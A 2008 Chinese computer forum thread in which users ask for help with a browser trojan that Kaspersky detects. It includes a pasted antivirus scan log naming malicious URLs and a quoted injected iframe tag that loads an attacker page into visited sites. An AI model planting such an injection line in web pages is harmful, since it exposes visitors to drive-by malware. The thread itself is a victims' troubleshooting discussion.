游客:  注册 | 登录 | 帮助
3s地带



标题: Trojan-Downloader.JS.Agent.auv一开网页卡巴报有这个木马
uyun0513
疾风
Rank: 4Rank: 4



UID 11913
精华 0
积分 150
帖子 44
现金 140
贡献值 0
阅读权限 40
注册 2007-11-7
状态 离线
发表于 2008-3-20 11:58 资料 个人空间 短消息 加为好友
Trojan-Downloader.JS.Agent.auv一开网页卡巴报有这个木马

Trojan-Downloader.JS.Agent.auv一开网页卡巴报有这个木马

顶部
frunk5000
疾风
Rank: 4Rank: 4



UID 12003
精华 0
积分 180
帖子 43
现金 170
贡献值 0
阅读权限 40
注册 2007-11-7
状态 离线
发表于 2008-3-20 11:58 资料 个人空间 短消息 加为好友
Web反病毒保护
-------------
已扫描: 1781
已扫描(脚本): 6
已扫描(http): 2
开始时间: 2008-1-10 1:07:59
持续时间: 00:36:33

已检测
------
状态 对象
---- ----
已检测到: 木马程序 Trojan-Downloader.JS.Agent.auv 脚本: [url=http://www.hao123.com/[2]http://www.hao123.com/[2[/url]]
已检测到: 恶意程序 Exploit.JS.Agent.dc URL: http://www.68yu.cn/ff/real.htm
已检测到: 木马程序 Trojan-Downloader.JS.Agent.auv 脚本: [url=http://lz.e-movie.com.cn/gui/[2]http://lz.e-movie.com.cn/gui/[2[/url]]
已检测到: 木马程序 Trojan-Downloader.JS.Agent.auv 脚本: [url=http://www.xiew.net/html/news.html[2]http://www.xiew.net/html/news.html[2[/url]]
已检测到: 木马程序 Trojan-Downloader.JS.Agent.auv 脚本: [url=http://bbs.360safe.com/[2]http://bbs.360safe.com/[2[/url]]
已检测到: 木马程序 Trojan-Downloader.JS.Agent.auv 脚本: [url=http://360.qihoo.com/service/?app=name&type=2&qcver=3.6.0.0&spyer[]=DisplayName:Trojan%2FWin32%2ERootkit%2En||Publisher:||Desc:[2]http://360.qihoo.com/service/?app=name&type=2&qcver=3.6.0.0&spyer[]=DisplayName:Trojan%2FWin32%2ERootkit%2En||Publisher:||Desc:[2[/url]]

事件
----
时间 名称 状态 原因
---- ---- ---- ----
2008-1-10 1:10:09 URL: http://www.hao123.com/ ok 已扫描
2008-1-10 1:10:10 URL: http://www.68yu.cn/fff.htm ok 已扫描
2008-1-10 1:10:10 脚本: [url=http://www.hao123.com/[1]http://www.hao123.com/[1[/url]] ok 已扫描
2008-1-10 1:10:10 脚本: [url=http://www.hao123.com/[2]http://www.hao123.com/[2[/url]] ok 已扫描
2008-1-10 1:10:10 脚本: [url=http://www.hao123.com/[3]http://www.hao123.com/[3[/url]] ok 已扫描
2008-1-10 1:10:10 脚本: [url=http://www.hao123.com/[4]http://www.hao123.com/[4[/url]] ok 已扫描
2008-1-10 1:10:10 脚本: [url=http://www.hao123.com/[5]http://www.hao123.com/[5[/url]] ok 已扫描
2008-1-10 1:10:10 脚本: [url=http://www.hao123.com/[6]http://www.hao123.com/[6[/url]] ok 已扫描
2008-1-10 1:10:10 URL: http://js.users.51.la/1358998.js ok iChecker
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[1]http://www.hao123.com/[1[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[2]http://www.hao123.com/[2[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[3]http://www.hao123.com/[3[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[4]http://www.hao123.com/[4[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[5]http://www.hao123.com/[5[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[6]http://www.hao123.com/[6[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[7]http://www.hao123.com/[7[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[7]http://www.hao123.com/[7[/url]] ok 已扫描
2008-1-10 1:10:11 脚本: [url=http://www.hao123.com/[8]http://www.hao123.com/[8[/url]] ok 已扫描
2008-1-10 1:10:11 URL: http://www.68yu.cn/shibie.htm ok 已扫描
2008-1-10 1:10:12 脚本: [url=http://www.hao123.com/[1]http://www.hao123.com/[1[/url]] ok 已扫描
2008-1-10 1:10:12 URL: http://www.68yu.cn/ff/06014.htm ok 已扫描
2008-1-10 1:10:12 脚本: [url=http://www.hao123.com/[1]http://www.hao123.com/[1[/url]] ok 已扫描
2008-1-10 1:10:12 脚本: [url=http://www.hao123.com/[1]http://www.hao123.com/[1[/url]] ok 已扫描
2008-1-10 1:10:12 URL: http://www.68yu.cn/ff/pps.htm ok 已扫描
2008-1-10 1:10:12 脚本: [url=http://www.hao123.com/[1]http://www.hao123.com/[1[/url]] ok 已扫描
2008-1-10 1:10:12 脚本: [url=http://www.hao123.com/[2]http://www.hao123.com/[2[/url]] 已检测 木马程序 Trojan-Downloader.JS.Agent.auv
2008-1-10 1:10:12 脚本: [url=http://www.hao123.com/[2]http://www.hao123.com/[2[/url]] 拒绝访问
2008-1-10 1:10:14 URL: http://activex.microsoft.com/objects/ocget.dll ok 已扫描
2008-1-10 1:10:15 URL: http://codecs.microsoft.com/isapi/ocget.dll ok 已扫描
2008-1-10 1:10:23 URL: http://www.68yu.cn/ff/real.htm 已检测 恶意程序 Exploit.JS.Agent.dc

  
顶部
fhxocrho
狂风
Rank: 5Rank: 5Rank: 5



UID 7654
精华 0
积分 690
帖子 230
现金 680
贡献值 0
阅读权限 50
注册 2007-8-24
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
上面是卡巴的报告一部分 好心人帮看一下吧 怎么杀都杀不掉


顶部
rsfrfz11
狂风
Rank: 5Rank: 5Rank: 5



UID 7868
精华 0
积分 690
帖子 236
现金 680
贡献值 0
阅读权限 50
注册 2007-8-24
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
请问你电脑出现的是啥症状?是上网的时候弹网页,还是咋的?

顶部
ksvk0i
狂风
Rank: 5Rank: 5Rank: 5



UID 7708
精华 0
积分 587
帖子 154
现金 577
贡献值 0
阅读权限 50
注册 2007-8-24
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
啊,和我中的病毒是一样的,不能彻底的清除掉,郁闷着呢


顶部
威哥哥
狂风
Rank: 5Rank: 5Rank: 5



UID 7749
精华 0
积分 555
帖子 188
现金 545
贡献值 0
阅读权限 50
注册 2007-8-24
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
请清空临了市文件和COOKIES文件
如若还不行,请上传报告

顶部
hbon01
疾风
Rank: 4Rank: 4



UID 11495
精华 0
积分 371
帖子 87
现金 361
贡献值 0
阅读权限 40
注册 2007-11-7
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
我也中了


我们的多台电脑也这样,每个网站上都被加了一个<iframe src='http://www.68yu.cn/fff.htm' width=100 height=100></iframe>
造成了网速变慢,很多带iframe的网站都不能正常显示

顶部
速140
疾风
Rank: 4Rank: 4



UID 7773
精华 0
积分 268
帖子 83
现金 258
贡献值 0
阅读权限 40
注册 2007-8-24
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
这也中了:(难杀啊,昏

顶部
绣气
疾风
Rank: 4Rank: 4



UID 7636
精华 0
积分 245
帖子 73
现金 235
贡献值 0
阅读权限 40
注册 2007-8-24
状态 离线
发表于 2008-3-20 11:59 资料 个人空间 短消息 加为好友
我也中了
中毒的症状是打开新浪和百度等网站上面都有一个小白框
在小白框的位置点 右键--->属性 可以看到http://www.68yu.cn/fff.htm 的地址
郁闷的吐血

顶部


 
当前时区 GMT+8, 现在时间是 2008-9-8 06:07 清除 Cookies - 联系我们 - 3S地带 - Archiver - WAP - 赣ICP备07006302号
Powered by Discuz! 5.5.0  © Processed in 0.466776 second(s), 6 queries , Gzip enabled 本论坛支付平台由支付宝提供
携手打造安全诚信的交易社区